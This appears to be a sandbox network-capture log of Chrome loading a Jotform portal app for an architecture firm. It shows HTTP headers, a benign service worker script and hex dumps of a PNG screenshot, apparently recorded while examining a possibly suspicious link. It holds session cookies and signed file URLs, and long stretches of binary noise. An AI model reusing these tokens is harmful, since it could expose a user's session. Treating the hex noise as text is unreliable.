                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC842OUTGET /action?actor=guest_5a3c5173c0bb4f63&action=appViewed&target=%7B%22portalID%22:%22250092704521347%22,%22portalType%22:%22APP%22,%22utmSource%22:null,%22device%22:%22desktop%22,%22isPWA%22:false%7D&project=portal-app&ref=https:%2F%2Feu.jotform.com%2Fapp%2F250092704521347 HTTP/1.1
                                                                                                                                                                                                                                            Host: events.jotform.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            Accept: application/json, text/plain, */*
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Origin: https://eu.jotform.com
                                                                                                                                                                                                                                            Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC494INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:19 GMT
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            access-control-allow-headers: origin, content-type, accept
                                                                                                                                                                                                                                            access-control-allow-methods: POST, GET, OPTIONS
                                                                                                                                                                                                                                            access-control-allow-origin: https://eu.jotform.com
                                                                                                                                                                                                                                            Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                            expires: Thu, 1 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 07:36:19 GMT
                                                                                                                                                                                                                                            pragma: no-cache
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb64709165e62-EWR


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            88192.168.2.1749802104.19.128.1054435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC827OUTGET /uploads/Gittens_Murray/form_files/Screenshot%202025-01-10%20at%2002.51.26.678100df0e5de0.10817411.png HTTP/1.1
                                                                                                                                                                                                                                            Host: www.jotform.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                            Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC729INHTTP/1.1 302 Found
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:19 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:05:16 GMT
                                                                                                                                                                                                                                            jf-trace-id: a802cafc6caf1433
                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000;
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 13:36:19 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=3600
                                                                                                                                                                                                                                            pragma: no-cache
                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                            location: https://eu-files.jotform.com/jufs/Gittens_Murray/form_files/Screenshot%202025-01-10%20at%2002.51.26.678100df0e5de0.10817411.png?md5=My-OIzLTfKJ5W-I8bVcA3w&expires=1736510726
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Age: 1863
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb6474bcc8c41-EWR


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            89192.168.2.1749803104.19.128.1054435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC653OUTGET /app/250092704521347/serviceWorker.js HTTP/1.1
                                                                                                                                                                                                                                            Host: eu.jotform.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Service-Worker: script
                                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                            Sec-Fetch-Mode: same-origin
                                                                                                                                                                                                                                            Sec-Fetch-Dest: serviceworker
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/app/250092704521347
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC1163INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:19 GMT
                                                                                                                                                                                                                                            Content-Type: text/javascript;charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                                                            p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:36:19 GMT
                                                                                                                                                                                                                                            jf-trace-id: a3c9c84185216d99
                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000;
                                                                                                                                                                                                                                            content-security-policy-report-only: default-src https: data: blob: wss: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' *.jotfor.ms https://js.jotform.com/actions.js https://www.googletagmanager.com https://consent.cookiebot.com https://consentcdn.cookiebot.com https://static.olark.com https://knrpc.olark.com/nrpc/ https://js-agent.newrelic.com https://browser.sentry-cdn.com https://js.sentry-cdn.com https://edge.fullstory.com https://rs.fullstory.com; report-uri /opt/csp-violation-report.php
                                                                                                                                                                                                                                            expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            pragma: no-cache
                                                                                                                                                                                                                                            global-router: true
                                                                                                                                                                                                                                            x-raw-uri: /app/:appID/serviceWorker.js
                                                                                                                                                                                                                                            service-worker-allowed: /app/250092704521347
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            CF-Cache-Status: MISS
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb6477e490f55-EWR
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC206INData Raw: 38 32 39 0d 0a 2f 2a 20 65 73 6c 69 6e 74 2d 64 69 73 61 62 6c 65 20 6e 6f 2d 75 6e 64 65 66 2c 6e 6f 2d 72 65 73 74 72 69 63 74 65 64 2d 67 6c 6f 62 61 6c 73 20 2a 2f 0a 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 27 73 65 72 76 69 63 65 20 77 6f 72 6b 65 72 20 73 75 63 63 65 65 64 20 66 6f 72 20 61 70 70 20 47 69 74 74 65 6e 73 20 4d 75 72 72 61 79 20 41 72 63 68 69 74 65 63 74 73 20 4c 74 64 27 29 3b 0a 0a 63 6f 6e 73 74 20 63 61 63 68 65 4e 61 6d 65 20 3d 20 27 64 79 6e 61 6d 69 63 2d 76 31 2d 32 35 30 30 39 32 37 30 34 35 32 31 33 34 37 27 3b 0a 0a 74 72 79 20 7b 0a 20 20 69 6d 70 6f 72 74 53 63 72 69 70 74 73 28
                                                                                                                                                                                                                                            Data Ascii: 829/* eslint-disable no-undef,no-restricted-globals */console.log('service worker succeed for app Gittens Murray Architects Ltd');const cacheName = 'dynamic-v1-250092704521347';try { importScripts(
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC1369INData Raw: 27 68 74 74 70 73 3a 2f 2f 63 64 6e 30 31 2e 6a 6f 74 66 6f 72 2e 6d 73 2f 73 2f 75 6d 64 2f 36 37 34 61 63 31 34 34 31 31 65 2f 66 6f 72 2d 70 75 73 68 2d 6e 6f 74 69 66 69 63 61 74 69 6f 6e 2e 6a 73 27 29 3b 0a 20 20 73 65 6c 66 5b 27 66 6f 72 2d 70 75 73 68 2d 6e 6f 74 69 66 69 63 61 74 69 6f 6e 27 5d 2e 69 6e 69 74 69 61 6c 69 7a 65 28 7b 0a 20 20 20 20 72 65 73 6f 75 72 63 65 49 64 3a 20 27 32 35 30 30 39 32 37 30 34 35 32 31 33 34 37 27 2c 0a 20 20 20 20 72 65 73 6f 75 72 63 65 54 79 70 65 3a 20 27 70 6f 72 74 61 6c 27 0a 20 20 7d 29 3b 0a 7d 20 63 61 74 63 68 28 65 72 72 29 20 7b 0a 20 20 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 27 43 61 6e 20 6e 6f 74 20 69 6e 69 74 69 61 6c 69 7a 65 20 70 75 73 68 20 6e 6f 74 69 66 69 63 61 74 69 6f 6e 20 73 65
                                                                                                                                                                                                                                            Data Ascii: 'https://cdn01.jotfor.ms/s/umd/674ac14411e/for-push-notification.js'); self['for-push-notification'].initialize({ resourceId: '250092704521347', resourceType: 'portal' });} catch(err) { console.error('Can not initialize push notification se
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC521INData Raw: 22 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 63 6f 72 73 50 72 65 66 65 72 65 6e 63 65 73 2e 73 65 74 28 64 6f 6d 61 69 6e 2c 20 22 6e 6f 2d 63 6f 72 73 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 72 65 73 70 6f 6e 73 65 20 3d 20 61 77 61 69 74 20 66 65 74 63 68 28 65 76 65 6e 74 2e 72 65 71 75 65 73 74 2c 20 7b 20 6d 6f 64 65 3a 20 22 6e 6f 2d 63 6f 72 73 22 20 7d 29 3b 0a 20 20 20 20 20 20 20 20 20 20 63 61 63 68 65 2e 70 75 74 28 65 76 65 6e 74 2e 72 65 71 75 65 73 74 2c 20 72 65 73 70 6f 6e 73 65 2e 63 6c 6f 6e 65 28 29 29 3b 0a 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 72 65 73 70 6f 6e 73 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 29 3b 0a 20 20 7d 29 29 3b 0a 7d 29 3b 0a 0a 73 65 6c 66 2e
                                                                                                                                                                                                                                            Data Ascii: ") { corsPreferences.set(domain, "no-cors"); const response = await fetch(event.request, { mode: "no-cors" }); cache.put(event.request, response.clone()); return response; } } }); }));});self.
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            90192.168.2.174980434.107.251.1254435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC875OUTGET /jufs/Gittens_Murray/form_files/Screenshot%202025-01-10%20at%2002.51.26.678100df0e5de0.10817411.png?md5=My-OIzLTfKJ5W-I8bVcA3w&expires=1736510726 HTTP/1.1
                                                                                                                                                                                                                                            Host: eu-files.jotform.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                            Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC504INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            access-control-allow-headers: Content-Type, Content-Length, Accept-Encoding, X-CSRF-Token, Authorization, accept, origin, Cache-Control, X-Requested-With, newrelic, traceparent, tracestate
                                                                                                                                                                                                                                            access-control-allow-methods: OPTIONS, GET
                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                            cache-control: public,max-age=7200
                                                                                                                                                                                                                                            content-type: image/png
                                                                                                                                                                                                                                            date: Fri, 10 Jan 2025 12:36:20 GMT
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC886INData Raw: 33 34 64 66 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 82 00 00 00 60 08 06 00 00 00 10 01 75 b4 00 00 0a b2 69 43 43 50 49 43 43 20 50 72 6f 66 69 6c 65 00 00 48 89 95 97 07 54 53 d9 16 86 cf bd e9 8d 92 40 04 a4 84 de 91 4e 00 29 21 b4 50 04 e9 60 23 24 01 02 21 84 40 50 11 3b 83 43 19 51 44 a4 d9 d0 41 11 05 47 a5 c8 58 b1 60 1b 14 0b 76 07 44 04 d4 71 b0 60 43 e5 5d 60 11 66 e6 ad f7 de 7a 7b ad 93 fd 65 df 7d f7 d9 e7 ac 73 d6 fa 2f 00 14 4d ae 44 22 82 95 00 48 13 67 49 c3 fc bc 18 31 b1 71 0c dc 10 20 03 08 90 00 15 a0 b9 bc 4c 09 2b 34 34 08 20 36 ed ff 6e 1f 7a 90 5c c4 6e 59 4e d4 fa f7 e7 ff d5 94 f9 82 4c 1e 00 50 28 c2 09 fc 4c 5e 1a c2 c7 90 f1 81 27 91 66 01 80 3a 88 c4 f5 97 66 49 26 f8 06 c2 2a 52 a4 41 84 9f 4d 70 d2
                                                                                                                                                                                                                                            Data Ascii: 34dfPNGIHDR`uiCCPICC ProfileHTS@N)!P`#$!@P;CQDAGX`vDq`C]`fz{e}s/MD"HgI1q L+44 6nz\nYNLP(L^'f:fI&*RAMp
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1390INData Raw: 68 7f 74 24 9a 87 ce 40 af 42 17 a3 ab d0 fb d1 2d e8 f3 e8 5b e8 3e f4 08 fa 3b 86 82 d1 c4 98 63 5c 30 1c 4c 0c 26 09 b3 14 93 8f 29 c7 d4 61 9a 31 17 30 77 30 03 98 0f 58 2c 96 8e 35 c6 3a 61 fd b1 b1 d8 14 ec 0a 6c 31 76 3b b6 09 7b 06 db 8d ed c7 8e e2 70 38 75 9c 39 ce 0d 17 82 e3 e2 b2 70 f9 b8 4a dc 41 dc 69 dc 4d dc 00 ee 13 9e 84 d7 c1 db e2 7d f1 71 78 31 7e 1d be 1c 7f 00 7f 0a 7f 13 3f 88 1f 23 28 11 0c 09 2e 84 10 02 9f b0 9c 50 42 d8 4b 68 27 5c 27 0c 10 c6 88 ca 44 63 a2 1b 31 82 98 42 5c 4b ac 20 36 12 2f 10 1f 11 df 91 48 24 3d 92 33 69 3e 49 48 5a 43 aa 20 1d 26 5d 22 f5 91 3e 93 a9 64 33 32 9b bc 90 2c 23 6f 24 ef 23 9f 21 df 27 bf a3 50 28 46 14 4f 4a 1c 25 8b b2 91 52 4f 39 47 79 42 f9 a4 40 53 b0 52 e0 28 f0 15 56 2b 54 2b b4 28 dc
                                                                                                                                                                                                                                            Data Ascii: ht$@B-[>;c\0L&)a10w0X,5:al1v;{p8u9pJAiM}qx1~?#(.PBKh'\'Dc1B\K 6/H$=3i>IHZC &]">d32,#o$#!'P(FOJ%RO9GyB@SR(V+T+(
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1390INData Raw: b7 d4 1a d5 96 ef c1 ee c9 de f3 7c 6f d4 de ce 9f 99 3f d7 d7 69 d4 15 d5 7d db 27 de d7 bb 3f 6c ff f9 7a a7 fa fa 03 9a 07 4a 1a e0 06 59 c3 f0 c1 85 07 6f 1c f2 3e d4 d6 68 d9 b8 bb 89 de 54 74 18 1c 96 1d 7e f1 4b fc 2f 3d 47 02 8f 74 1c 65 1e 6d 3c 66 78 ac a6 99 d6 5c d8 02 b5 2c 6f 19 69 4d 6e ed 6d 8b 6d eb 3e 1e 70 bc a3 dd b5 bd f9 57 ab 5f f7 9d d0 3d 51 7d 52 f5 64 c9 29 e2 a9 bc 53 e3 a7 73 4e 8f 9e 91 9c 79 75 36 e9 6c 7f c7 92 8e 87 e7 62 ce dd 3e 3f ff 7c d7 85 c0 0b 97 2e fa 5e 3c d7 c9 ea 3c 7d c9 ed d2 89 cb 2e 97 8f 5f 61 5e 69 bd ea 78 b5 e5 9a c3 b5 e6 df 1c 7e 6b ee 72 ec 6a b9 ee 74 bd ed 86 f3 8d f6 ee b9 dd a7 6e 7a dc 3c 7b cb fb d6 c5 db 9c db 57 ef cc bb d3 dd 13 d9 73 ef ee c2 bb bd f7 f8 f7 86 ee 8b ee bf 79 90 fd 60 ec e1
                                                                                                                                                                                                                                            Data Ascii: |o?i}'?lzJYo>hTt~K/=Gtem<fx\,oiMnmm>pW_=Q}Rd)SsNyu6lb>?|.^<<}._a^ix~krjtnz<{Wsy`
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1390INData Raw: 0a 14 8a a0 99 33 40 31 fd 82 02 05 05 0a 0a 14 8a a0 e0 81 82 02 05 05 0a 0a 34 73 0a 14 8a a0 99 33 40 31 fd 82 02 05 05 0a 0a 14 8a a0 e0 81 82 02 05 05 0a 0a 34 73 0a 14 8a a0 99 33 40 31 fd 82 02 05 05 0a 0a 14 8a a0 e0 81 82 02 05 05 0a 0a 34 73 0a e4 52 04 2d 5b b6 0c ad 5a b5 0a 6d db b5 0b 1d 3a b4 0f 6d da b4 0d 2d 5b b6 08 6d 5a b7 09 ed e4 b3 96 f2 dd b9 b3 67 c3 99 86 33 e1 74 fd 69 7d 3d 7b f6 5c 38 7d ba 3e 9c 38 71 32 d4 9f 3a 15 1a 1a 1a c2 59 f9 4d 5a a3 af 4e 9d 3a 85 76 ed db e9 cf 4e 9d 3c 15 0e 1f 3e 1c 4e c9 f5 b4 d6 ad 5b eb 78 fc 8e 7f ad 5a b7 d2 cf ab f5 1f f7 dc 70 e6 cc 85 fb d4 79 cb 98 cc b5 9a ad e1 4c 83 ce 89 79 f1 ef 8c 8c 49 f3 f3 af 74 4c d6 e0 d8 f1 63 01 fa 45 e9 6e eb 08 7d 6b 3a d6 84 36 6d db e8 10 9e ce 79 c7 f5
                                                                                                                                                                                                                                            Data Ascii: 3@14s3@14s3@14sR-[Zm:m-[mZg3ti}={\8}>8q2:YMZN:vN<>N[xZpyLyItLcEn}k:6my
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1390INData Raw: 8c da da ba 6a 0d a1 fd 30 06 73 5b bc 68 71 58 b2 78 b1 8e c9 17 7e fe 95 0e ba 76 ed 9a f0 f2 4b 2f eb 18 71 f3 61 9c 9b 6f b9 59 ac d1 11 3a c4 b6 6d 5b 55 11 2c 5a b8 28 97 25 63 f7 67 74 b2 7e a1 57 dc fc ec f7 f6 8a 01 81 b0 1f 79 e5 95 e1 fa 99 d7 87 91 23 47 2a 34 88 35 da 56 bc 8a 12 3c d4 46 21 13 78 ab e4 e2 9f 87 86 ce f3 16 6b b6 54 78 ea b9 3f 3d 17 56 0b 8f 35 a5 f9 79 18 7d f0 6e 4f 0a 1f 2f 5d ba 34 3c fb cc 1f c2 f2 65 cb 9b e4 81 d8 bc e1 e5 db ef b8 5d bd 60 f6 93 41 43 9e ef fd 9c fc 3e e0 fb 2c f4 f6 fd f8 f7 c3 47 0c 17 be b8 45 f7 17 63 c0 3b 71 7c 64 d7 f9 fb e0 7d 5a 6b 38 2b f0 8c ac db 19 a1 27 30 1f 5e 1e 56 3a 02 73 a1 18 2e 6b d7 ac 4d b5 d8 93 d6 27 69 4c 64 10 50 a2 42 8a 02 0f a1 88 8e c8 de de be 7d 9b f0 f9 2a e1 97 d5
                                                                                                                                                                                                                                            Data Ascii: j0s[hqXx~vK/qaoY:m[U,Z(%cgt~Wy#G*45V<F!xkTx?=V5y}nO/]4<e]`AC>,GEc;q|d}Zk8+'0^V:s.kM'iLdPB}*
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1390INData Raw: 40 be 37 4d 65 9a 0d 8f 02 6c 17 45 30 40 88 a3 02 52 16 19 4b 35 cd 55 f2 82 d0 2b 02 13 20 25 0b 9c 20 6e db 58 ba 60 c1 13 cf 18 2b 84 c5 d5 aa 11 85 11 67 81 fb 8b 11 38 e0 8a 66 c9 9b 67 c1 6b 5c f3 1e 0a 96 b7 59 e2 ea 59 88 87 11 d7 f0 48 c0 bc a1 2d 02 c0 e8 e7 e7 8f 45 ff e4 63 4f a8 65 1f d7 4f d2 67 d0 1b a6 a1 7f fa 36 6b d3 6f 24 2c 51 04 29 0d 46 dc 28 6b 9c c7 92 b1 f1 7d bf e5 14 81 29 f4 29 c2 a8 77 dc 79 a7 58 c4 23 f4 3e 18 ff 03 31 18 56 2c 5f 7e 51 11 c8 1c 10 c2 ac bd 79 78 c4 a5 d8 d8 04 27 99 df 2e 51 78 79 82 73 76 df fe d5 cf 63 f8 88 11 8d 04 34 4a 1b 8c 95 0d ce 46 67 c3 57 d2 0c 82 61 fe e0 ca cc 03 43 ab 95 04 8b 89 c7 2d 15 4b f0 52 54 04 40 79 69 fb ac b4 7f 4b c6 22 06 e2 e0 21 83 05 17 1f a6 8a 10 da 63 f0 20 f8 d8 f7 e0
                                                                                                                                                                                                                                            Data Ascii: @7MelE0@RK5U+ % nX`+g8fgk\YYH-EcOeOg6ko$,Q)F(k}))wyX#>1V,_~Qyx'.Qxysvc4JFgWaC-KRT@yiK"!c
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1390INData Raw: 95 db 6e 55 97 02 46 05 c6 01 33 43 d3 46 d3 1b 7d 27 d5 7e 5f 28 82 f4 ac a9 a6 d2 db 6f 24 53 90 e0 ac e0 ef fd 04 0a 01 9b 24 d3 02 b7 36 cd a5 8c de 4b 52 bf 49 96 e1 a5 a2 08 8c 3e fb 24 95 8f 1c 79 36 25 9e 01 41 c9 67 9e fe bd 0a 2c 85 00 45 90 67 69 96 a7 3f 4d 14 01 ee 3f d0 2b 82 82 0d 0a 4c 36 52 ac 48 94 0d 70 6c 73 f0 08 cc b2 66 df 7f ff 5f 1f 52 88 08 41 8c 22 f8 e5 2f fe 4f 31 f6 28 5d 3d 9f e5 55 04 d6 97 41 3a 33 64 1d 30 86 d6 08 1c fa e8 23 bf 15 4f 66 8e 06 ad 11 e6 69 4d 83 c4 22 6c 31 00 af b9 f6 f3 9a 2c f3 ca 5f ff aa 69 9e 20 29 9c 05 00 92 ae 11 78 68 f6 07 1f e8 7c e6 4a 26 58 52 b6 a4 1f cb ef 0f 2c 7e 3c e5 b9 b3 e7 6a 5f fe 1c 8b 79 3a 78 9a 77 7d e3 1b 82 e8 0c 53 4f 9e 18 05 8a 60 99 c4 67 93 a0 29 55 04 b6 10 68 90 7b ee
                                                                                                                                                                                                                                            Data Ascii: nUF3CF}'~_(o$S$6KRI>$y6%Ag,Egi?M?+L6RHplsf_RA"/O1(]=UA:3d0#OfiM"l1,_i )xh|J&XR,~<j_y:xw}SO`g)Uh{
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1390INData Raw: 6c 16 5a c5 fd 26 69 1e 40 40 94 47 e1 60 22 d0 10 07 c1 a8 0d 43 ca 20 96 e0 3c 39 f9 99 76 7f 3e 4d 92 da 37 d1 83 7b d4 34 6a 4e 8a c0 af 3f 16 2f 55 58 8f 4a a0 38 ed c0 9e 5f 9f bc 82 cf cb 3b fa 03 f2 c4 f8 c8 52 ab ca af 23 07 4d 91 93 c8 4b e4 a6 c5 8a 50 70 c4 21 90 67 28 38 ce 4d e0 75 ab b2 96 e0 31 fc 9c a5 99 c7 94 14 04 3e 70 60 bf c2 53 a4 fd 33 16 2d cf 01 34 7e af 8a a0 a9 96 85 61 7c 58 73 fc a3 76 48 5a 8b ab 87 1d fd 7d a1 08 1a 2b 02 dc 64 dc 4d ca 79 64 69 58 a5 58 1b 28 10 2c 4e 7f 70 ce 6f 24 af 08 4c 60 fb 60 18 01 3c f0 4d 04 de 7b 72 b2 76 93 d4 66 89 e6 5b 67 ed d7 cf c1 62 05 28 1c 94 cf 00 39 6d 4a 6a 1e c1 53 32 99 a8 2a 8a 22 e0 88 3c f9 e5 fb f6 51 b2 5b aa 49 4a ae b6 55 aa ac 26 74 59 6e 1e 58 b2 33 3e f7 39 dd 74 d3 24
                                                                                                                                                                                                                                            Data Ascii: lZ&i@@G`"C <9v>M7{4jN?/UXJ8_;R#MKPp!g(8Mu1>p`S3-4~a|XsvHZ}+dMydiXX(,Npo$L``<M{rvf[gb(9mJjS2*"<Q[IJU&tYnX3>9t$
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1390INData Raw: cb 46 a7 df 25 22 cc a2 59 44 78 10 04 ee 80 4c c8 5e 68 2a bd 6d e3 51 76 01 45 50 52 08 03 54 19 a0 28 e0 25 3c 04 04 29 c1 45 6a 61 b1 b9 b1 42 d3 36 74 94 47 e2 fe ce 4a 1f ea ce 53 0b 06 7e 05 72 c0 a2 7c 34 e6 64 2a ca 2b 9a 95 e7 83 c4 94 53 a0 e5 e5 fb 4f ab 22 28 f7 3c 02 1e 38 04 2c 84 25 0b e4 89 50 26 3b d1 e2 09 54 60 4d 6b 7e 7d ca 3d 8f 80 20 2d c9 0e f0 27 c5 23 37 49 09 7a 9e b7 81 07 a7 b1 37 e1 97 2c cd af 23 0a 7d b3 28 ae 95 62 88 2c 14 99 86 77 11 d7 2c 06 86 7c cc 12 0c 8f eb 83 cf cc 30 43 c6 52 0b 8e e0 30 fb 0d 68 1e c3 83 14 ef 67 7e ff 7b 85 a8 d8 03 28 b6 ac ad 2a 8a 80 0d c9 e2 40 6c 36 3f ef a3 8d fa 2c 54 f9 23 98 81 50 41 fb 17 8a 20 4a a1 c6 7f 7b 81 90 b7 fa 28 27 5e cf ca 3f 7d c0 bb 30 08 01 dd 68 f3 1b a9 9c c0 b6 f5
                                                                                                                                                                                                                                            Data Ascii: F%"YDxL^h*mQvEPRT(%<)EjaB6tGJS~r|4d*+SO"(<8,%P&;T`Mk~}= -'#7Iz7,#}(b,w,|0CR0hg~{(*@l6?,T#PA J{('^?}0h
